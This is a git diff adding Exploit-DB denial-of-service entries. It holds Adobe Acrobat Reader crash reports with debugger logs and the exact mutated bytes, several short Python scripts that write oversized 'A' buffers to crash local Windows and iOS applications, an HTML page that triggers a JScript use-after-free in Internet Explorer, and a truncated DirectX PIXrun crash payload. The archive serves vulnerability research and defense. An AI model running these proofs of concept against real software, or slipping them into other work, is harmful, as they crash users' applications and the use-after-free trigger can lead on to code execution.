+1e 0478eddc 5f75687c 8355afa0 5f7567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
+1f 0478edf4 5f75678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
+20 0478ee10 745de0bb 02a20faa 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
+21 0478ee3c 745e8849 5f7566d0 02a20faa 0000000f USER32!_InternalCallWinProc+0x2b
+22 0478ee60 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+23 0478ef30 745d8503 5f7566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+24 0478ef98 745d8aa0 13f2abb0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+25 0478efe0 77371a6d 0478effc 00000020 0478f05c USER32!__fnDWORD+0x50
+26 0478f018 745d91ee 0478f0ac ce1677b9 18068dd8 ntdll!KiUserCallbackDispatcher+0x4d
+27 0478f06c 745d8c20 ca6e87d5 0478f090 5f76da6d USER32!DispatchMessageWorker+0x5be
+28 0478f078 5f76da6d 0478f0ac 18068dd8 18068dd8 USER32!DispatchMessageW+0x10
+29 0478f090 5f76d89e 0478f0ac ceb18ade 18068dd8 AcroRd32!DllCanUnloadNow+0x24b0d
+2a 0478f104 5f76d744 ceb18ae6 18068dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
+2b 0478f13c 5f6fc575 ceb18a76 16cb6ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
+2c 0478f1ac 5f6fbf81 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x775
+2d 0478f5cc 0011783d 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x181
+2e 0478f998 002201aa 00110000 00000000 0b48b3f2 AcroRd32_exe+0x783d
+2f 0478f9e4 76698674 04504000 76698650 1f7eb52b AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
+30 0478f9f8 77365e17 04504000 fdd62153 00000000 KERNEL32!BaseThreadInitThunk+0x24
+31 0478fa40 77365de7 ffffffff 7738adab 00000000 ntdll!__RtlUserThreadStart+0x2f
+32 0478fa50 00000000 00111390 04504000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
+
+- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to a single byte at offset 0x2f5, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0x35.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47609.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47610.txt b/exploits/windows/dos/47610.txt
new file mode 100644
index 000000000..15eec9c11
--- /dev/null
+++ b/exploits/windows/dos/47610.txt
@@ -0,0 +1,142 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(5708.4564): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=c0c0c0c0 ebx=00000000 ecx=6826e380 edx=00000000 esi=00000002 edi=00000006
+eip=15e440e8 esp=047fc158 ebp=047fc1b8 iopl=0         nv up ei ng nz ac po cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210293
+CoolType!CTCleanup+0x25be8:
+15e440e8 f6403860        test    byte ptr [eax+38h],60h     ds:002b:c0c0c0f8=??
+
+0:000> u @$scopeip-9
+CoolType!CTCleanup+0x25bdf:
+15e440df 8b4d08          mov     ecx,dword ptr [ebp+8]
+15e440e2 8b7dc4          mov     edi,dword ptr [ebp-3Ch]
+15e440e5 8b0481          mov     eax,dword ptr [ecx+eax*4]
+15e440e8 f6403860        test    byte ptr [eax+38h],60h
+15e440ec 0f851f010000    jne     CoolType!CTCleanup+0x25d11 (15e44211)
+15e440f2 0fb7781a        movzx   edi,word ptr [eax+1Ah]
+15e440f6 0fb7401e        movzx   eax,word ptr [eax+1Eh]
+15e440fa 8bc8            mov     ecx,eax
+
+0:000> dd ecx
+6826e380  16063e80 16063e40 1605fd00 c0c0c0c0
+6826e390  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+6826e3a0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+6826e3b0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+6826e3c0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+6826e3d0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+6826e3e0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+6826e3f0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 047fc1b8 15e434ea 6826e380 1605fce0 6826e388 CoolType!CTCleanup+0x25be8
+01 047fc1d4 15e43f02 6826e380 1605fd00 6826e388 CoolType!CTCleanup+0x24fea
+02 047fc1fc 15e4edc1 6936cff0 16063e40 1605fd00 CoolType!CTCleanup+0x25a02
+03 047fc230 15deb53d 6936cbf0 047fcca4 00000f5c CoolType!CTCleanup+0x308c1
+04 047fc94c 15de6251 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x483dd
+05 047fca30 15e223fa 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x430f1
+06 047fcb88 15e220be 6936cbf0 047fcd5c 047fcd2c CoolType!CTCleanup+0x3efa
+07 047fcc04 15df972d 6936cbf0 16067080 047fcd5c CoolType!CTCleanup+0x3bbe
+08 047fcdcc 15df8f00 047fcfc0 00000000 16067330 CoolType!CTInit+0x565cd
+09 047fce9c 15df7d87 0b601000 00000001 00000001 CoolType!CTInit+0x55da0
+0a 047fd268 15df7414 0000012c 86c0e9cc 00001aba CoolType!CTInit+0x54c27
+0b 047fd2ac 15df63de 86c0e9c0 00000064 047fd344 CoolType!CTInit+0x542b4
+0c 047fd41c 15df5eb9 047fd834 047fdbb0 0000044a CoolType!CTInit+0x5327e
+0d 047fd470 16112a42 3ede4e60 047fd834 047fdbb0 CoolType!CTInit+0x52d59
+0e 047fd7b8 16111888 8ec19b64 047fd834 047fdbb0 AGM!AGMInitialize+0x69bd2
+0f 047fd918 160dc460 047fd980 8ec19b00 047fdc48 AGM!AGMInitialize+0x68a18
+10 047fd9b4 160e469a 047fdb98 8ec19b00 047fdc48 AGM!AGMInitialize+0x335f0
+11 047fdbe0 160e2ae0 3eb84ba0 67b69f70 8ec19b00 AGM!AGMInitialize+0x3b82a
+12 047fddbc 160e186c 3eb84ba0 67b69f70 56375db9 AGM!AGMInitialize+0x39c70
+13 047fde08 161107ff 3eb84ba0 67b69f70 68a8ad50 AGM!AGMInitialize+0x389fc
+14 047fde2c 1611030e 00000301 1611044f 67b69f70 AGM!AGMInitialize+0x6798f
+15 047fde34 1611044f 67b69f70 56375d11 68a8ad50 AGM!AGMInitialize+0x6749e
+16 047fde6c 160b945b 047fdf40 1610f910 00000000 AGM!AGMInitialize+0x675df
+17 047fdec0 5fdcd4ad 047fde00 5fdcd4b4 dd9e27c4 AGM!AGMInitialize+0x105eb
+18 047fdec8 5fdcd4b4 dd9e27c4 68a8ad50 047fdeac AcroRd32!DllCanUnloadNow+0x18454d
+19 047fdee8 5fddb77d 3ede4f64 7cb8ed90 047fdf00 AcroRd32!DllCanUnloadNow+0x184554
+1a 047fdf04 5fddb274 553c0f84 dd9e2644 553c0f58 AcroRd32!DllCanUnloadNow+0x19281d
+1b 047fdf6c 5fdeef36 dd9e2698 00000000 553c0f58 AcroRd32!DllCanUnloadNow+0x192314
+1c 047fdfb0 5fddaa40 dd9e26d4 5e4a0f78 553c0f58 AcroRd32!CTJPEGDecoderRelease+0x3426
+1d 047fdffc 5fdda902 dd9e196c 5e4a0f78 047fe0ec AcroRd32!DllCanUnloadNow+0x191ae0
+1e 047fe044 5fdda7e3 047fe060 dd9e1998 047fe41c AcroRd32!DllCanUnloadNow+0x1919a2
+1f 047fe0b0 5fdda677 047fe0ec 8ef46ff0 3fe7bc80 AcroRd32!DllCanUnloadNow+0x191883
+20 047fe110 5fdd8aed 8ef46ff0 5fddbc70 047fe41c AcroRd32!DllCanUnloadNow+0x191717
+21 047fe210 5fdd8542 047fe41c dd9e1b74 1a74ed88 AcroRd32!DllCanUnloadNow+0x18fb8d
+22 047fe25c 5fdd79dd 047fe41c 047fe424 dd9e1df0 AcroRd32!DllCanUnloadNow+0x18f5e2
+23 047fe4d8 5fdd77ee 00000002 81ffa4e2 dd9e1c1c AcroRd32!DllCanUnloadNow+0x18ea7d
+24 047fe534 5fd9706a 00000002 81ffa4e2 dd9e1ec4 AcroRd32!DllCanUnloadNow+0x18e88e
+25 047fe7ec 5fd95d98 5ee78ef8 047fe880 047fe8d0 AcroRd32!DllCanUnloadNow+0x14e10a
+26 047fe8f0 5fd95175 5ee78ef8 047fea20 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
+27 047fea44 5fd942ba 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14c215
+28 047feaa4 5fd9414d 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
+29 047feac4 5fd92d3c 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
+2a 047feb7c 5fd92762 00000001 00000000 dd9e12fc AcroRd32!DllCanUnloadNow+0x149ddc
+2b 047febd4 5fd9257a 7313eef0 00000001 dd9e1510 AcroRd32!DllCanUnloadNow+0x149802
+2c 047fec38 5fd922ff 047fed2c dd9e1464 81ff8fa0 AcroRd32!DllCanUnloadNow+0x14961a
+2d 047fed4c 5fc5687c 81ff8fa0 5fc567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
+2e 047fed64 5fc5678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
+2f 047fed80 745de0bb 03870c42 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
+30 047fedac 745e8849 5fc566d0 03870c42 0000000f USER32!_InternalCallWinProc+0x2b
+31 047fedd0 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+32 047feea0 745d8503 5fc566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+33 047fef08 745d8aa0 13ff4e80 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+34 047fef50 77371a6d 047fef6c 00000020 047fefcc USER32!__fnDWORD+0x50
+35 047fef88 745d91ee 047ff01c e165025c 18170dd8 ntdll!KiUserCallbackDispatcher+0x4d
+36 047fefdc 745d8c20 e51aed80 047ff000 5fc6da6d USER32!DispatchMessageWorker+0x5be
+37 047fefe8 5fc6da6d 047ff01c 18170dd8 18170dd8 USER32!DispatchMessageW+0x10
+38 047ff000 5fc6d89e 047ff01c dd9e095c 18170dd8 AcroRd32!DllCanUnloadNow+0x24b0d
+39 047ff074 5fc6d744 dd9e0984 18170dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
+3a 047ff0ac 5fbfc575 dd9e0834 16d7eff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
+3b 047ff11c 5fbfbf81 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x775
+3c 047ff53c 0011783d 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x181
+3d 047ff908 002201aa 00110000 00000000 0b61b3f2 AcroRd32_exe+0x783d
+3e 047ff954 76698674 0480b000 76698650 5ab919ba AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
+3f 047ff968 77365e17 0480b000 666934db 00000000 KERNEL32!BaseThreadInitThunk+0x24
+40 047ff9b0 77365de7 ffffffff 7738ad9b 00000000 ntdll!__RtlUserThreadStart+0x2f
+41 047ff9c0 00000000 00111390 0480b000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
+
+- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x71a4, 0x71a5 and 0x71ba. They were changed from 0x1C, 0x14, 0x89 to 0xFF, 0xFF, 0x0E. When we analyzed it further, we determined that these bytes reside inside the "CFF " table of the embedded OpenType font. After extracting the font and decompiling it with the ttx tool from FontTools, we found that the difference is in the CharString of the "afii10091" glyph.
+
+Original code:
+
+--- cut ---
+[...]
+          cntrmask 00011100
+          cntrmask 00000110
+          32 hmoveto
+          660 hlineto
+          120 0 32 -22 15 -146 rrcurveto
+          28 0 -13 203 -2 0 rlineto
+[...]
+--- cut ---
+
+Mutated code:
+
+--- cut ---
+[...]
+          cntrmask 11111111
+          1707.08974 -99 hlineto
+          120 0 32 -22 15 -146 rrcurveto
+          28 0 -13 203 endchar
+          0 rlineto
+[...]
+--- cut ---
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47610.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47662.txt b/exploits/windows/dos/47662.txt
new file mode 100644
index 000000000..9cea980df
--- /dev/null
+++ b/exploits/windows/dos/47662.txt
@@ -0,0 +1,37 @@
+# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019 -11-16
+# Vendor Homepage: http://www.smarteyegroup.com/
+# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
+# Tested Version: 1.3.34
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s - iOS 13.2
+
+##############################################################################################################################################
+
+Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live 
+video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of
+functions, such as local record video, set ftp params, set email, set motion alarm and so on.
+
+##############################################################################################################################################
+
+Steps to Produce the Crash:
+
+   1.- Run python code: iSmartViewPro.py
+   2.- Copy content to clipboard
+   3.- Open App "iSmartViewPro"
+   4.- Go to "Add Camera"
+   5.- go to "Add network cameras"
+   6.- Paste ClipBoard on "Camara DID"
+   7.- Paste ClipBoard on "Password"
+   8.- Next
+   9.- Crashed
+
+##############################################################################################################################################
+
+Python "iSmartViewPro" Code:
+
+   buffer = "\x41" * 257
+   print (buffer)
+
+##############################################################################################################################################
\ No newline at end of file
diff --git a/exploits/windows/dos/47671.py b/exploits/windows/dos/47671.py
new file mode 100755
index 000000000..6604f92bb
--- /dev/null
+++ b/exploits/windows/dos/47671.py
@@ -0,0 +1,23 @@
+# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
+# Author: chuyreds
+# Discovery Date: 2019-11-16
+# Vendor Homepage: https://www.foscam.es/
+# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
+# Tested Version: 1.1.4.9
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python foscam-vms-uid-dos.py
+# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
+# 3.- Open FoscamVMS
+# 4.- Go to Add Device
+# 5.- Choose device type "NVR"/"IPC"
+# 6.- Copy the content of the file into Username
+# 7.- Click on Login Check
+# 8.- Crashed
+ 
+buffer = "\x41" * 520
+f = open ("FoscamVMS_1.1.4.9.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47674.py b/exploits/windows/dos/47674.py
new file mode 100755
index 000000000..5ba3974df
--- /dev/null
+++ b/exploits/windows/dos/47674.py
@@ -0,0 +1,24 @@
+# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
+# Discovery by: Diego Buztamante
+# Discovery Date: 2019-11-18
+# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
+# Software Link : http://download.netscantools.com/ipls192.zip
+# Tested Version: 1.92
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python ipPulse_1.92.py
+# 2.- Open ipPulse_1.92.txt and copy content to clipboard
+# 3.- Open ippulse.exe
+# 4.- Click on "Enter Key"
+# 5.- Paste ClipBoard on "Name: "
+# 6.- OK
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 256
+f = open ("ipPulse_1.92.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47679.py b/exploits/windows/dos/47679.py
new file mode 100755
index 000000000..7146ac6ed
--- /dev/null
+++ b/exploits/windows/dos/47679.py
@@ -0,0 +1,30 @@
+#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-18
+#Vendor Homepage : https://www.xmedia-recode.de/
+#Link Software : https://www.xmedia-recode.de/download.php
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+#contact: msk4@live.fr
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install XMedia Recode 
+2.Run the python operating script that will create a file (poc.m3u)
+3.Run the software "File -> Open File -> Add the file (.m3u) "
+4.XMedia Recode Crashed
+'''
+
+#!/usr/bin/python
+
+http = "http://" 
+buffer = "\x41" * 500 
+
+poc = http + buffer
+file = open("poc.m3u,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47707.txt b/exploits/windows/dos/47707.txt
new file mode 100644
index 000000000..d8278b39f
--- /dev/null
+++ b/exploits/windows/dos/47707.txt
@@ -0,0 +1,108 @@
+There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.
+
+PoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied.
+
+===========================================================
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+    var spray = new Array();
+
+    function F() {
+        alert('callback');
+
+        // 2. Create a bunch of objects
+        for (var i = 0; i < 20000; i++) spray[i] = new Object();
+
+        // 3. Store a reference to one of them in the arguments array
+        //    The arguments array isn't tracked by garbage collector
+        arguments[0] = spray[5000];
+
+        // 4. Delete the objects and call the garbage collector
+        //    All JSCript variables get reclaimed... 
+        for (var i = 0; i < 20000; i++) spray[i] = 1;
+        CollectGarbage();
+
+        // 5. But we still have reference to one of them in the
+        //    arguments array
+        alert(arguments[0]);
+    }
+
+    // 1. Cause toJSON callback to fire
+    var o = {toJSON:F}
+    JSON.stringify(o);
+
+    alert('done');
+
+</script>
+
+===========================================================
+
+
+Debug log:
+
+===========================================================
+
+(1cf4.154): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8
+eip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+jscript!PrepareInvoke+0x12a:
+6e25f52a 0fb707          movzx   eax,word ptr [edi]       ds:002b:05fb12e8=????
+
+0:009> k
+ # ChildEBP RetAddr  
+00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a
+01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5
+02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e
+03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
+04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81
+05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399
+06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d
+07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed
+08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125
+09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac
+0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382
+0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea
+0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399
+0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6
+0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5
+0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e
+10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
+11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81
+12 05ecd170 6e257f75 jscript!CSession::Execute+0x314
+13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5
+14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3
+15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29
+16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
+17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182
+18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312
+19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba
+1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa
+1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186
+1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd
+1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339
+1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d
+1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60
+20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f
+21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39
+22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27
+23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd
+24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317
+25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52
+26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b
+27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac
+28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b
+29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10
+2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36
+2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403
+2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
+2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
+2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19
+2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f
+30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+===========================================================
\ No newline at end of file
diff --git a/exploits/windows/dos/47709.py b/exploits/windows/dos/47709.py
new file mode 100755
index 000000000..327026f95
--- /dev/null
+++ b/exploits/windows/dos/47709.py
@@ -0,0 +1,23 @@
+# Title : SMPlayer 19.5.0 - Denial of Service (PoC)
+# Tested on : Windows 7 (64 bit)
+# Vulnerable Software: SMPlayer v 19.5.0
+# Exploit Author: Malav Vyas
+# Vendor Homepage: https://smplayer.info
+# Version : 19.5.0
+# Software Link : https://smplayer.info/en/downloads
+
+# POC
+# run this python file, which will generate attack.m3u file
+# .m3u file is used as a playlist
+# this python file will generate a .m3u file with 25000 "A" characters.
+# Open this file in SMPlayer two times.
+# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.
+# For more details, please refer to video
+
+f="attack.m3u"
+
+bof = "A"*25000
+
+writeFile = open(f, "w")
+writeFile.write(bof)
+writeFile.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47711.py b/exploits/windows/dos/47711.py
new file mode 100755
index 000000000..7aea04977
--- /dev/null
+++ b/exploits/windows/dos/47711.py
@@ -0,0 +1,24 @@
+# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 12019-11-16
+# Vendor Homepage: https://on.wonderware.com/
+# Software Link : https://on.wonderware.com/intouch-machine-edition
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+# InTouch Machine Edition 8.1 SP1.py
+
+
+# Steps to Produce the Local Buffer Overflow (SEH Unicode):
+# 1.- Run python code: InTouch_Machine_Edition_8.1.py
+# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
+# 3.- Open ITME v8.1 InTouch Machine Edition
+# 4.- On Graficos slect Atributos
+# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
+#!/usr/bin/env python
+
+
+buffer = "\x41" * 1026
+f = open ("InTouch_Machine_Edition_8.1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47717.py b/exploits/windows/dos/47717.py
new file mode 100755
index 000000000..7eed53148
--- /dev/null
+++ b/exploits/windows/dos/47717.py
@@ -0,0 +1,33 @@
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2019-11-23
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link : http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Google Dork: chuyrojas1997@gmail.com: chuyreds
+# Discovery Date: 23-11-2019
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link : http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Denial of Service: 
+# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
+# 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
+# 3.- Open InduSoft Web Studio Edition 8.1 SP1
+# 4.- On Graficos slect Atributos
+# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
+
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1026
+f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47718.py b/exploits/windows/dos/47718.py
new file mode 100755
index 000000000..a15b1b24f
--- /dev/null
+++ b/exploits/windows/dos/47718.py
@@ -0,0 +1,48 @@
+#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-26
+#Vendor Homepage : https://www.microsoft.com/
+#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
+#Tested on OS: Windows 7
+
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Microsoft DirectX SDK
+2.Open the PIX for Windows tools 
+2.Run the python operating script that will create a file (poc.PIXrun)
+3.Run the software "File -> Open File -> Add the file (.PIXrun) "
+4.PIX for Windows Crashed
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
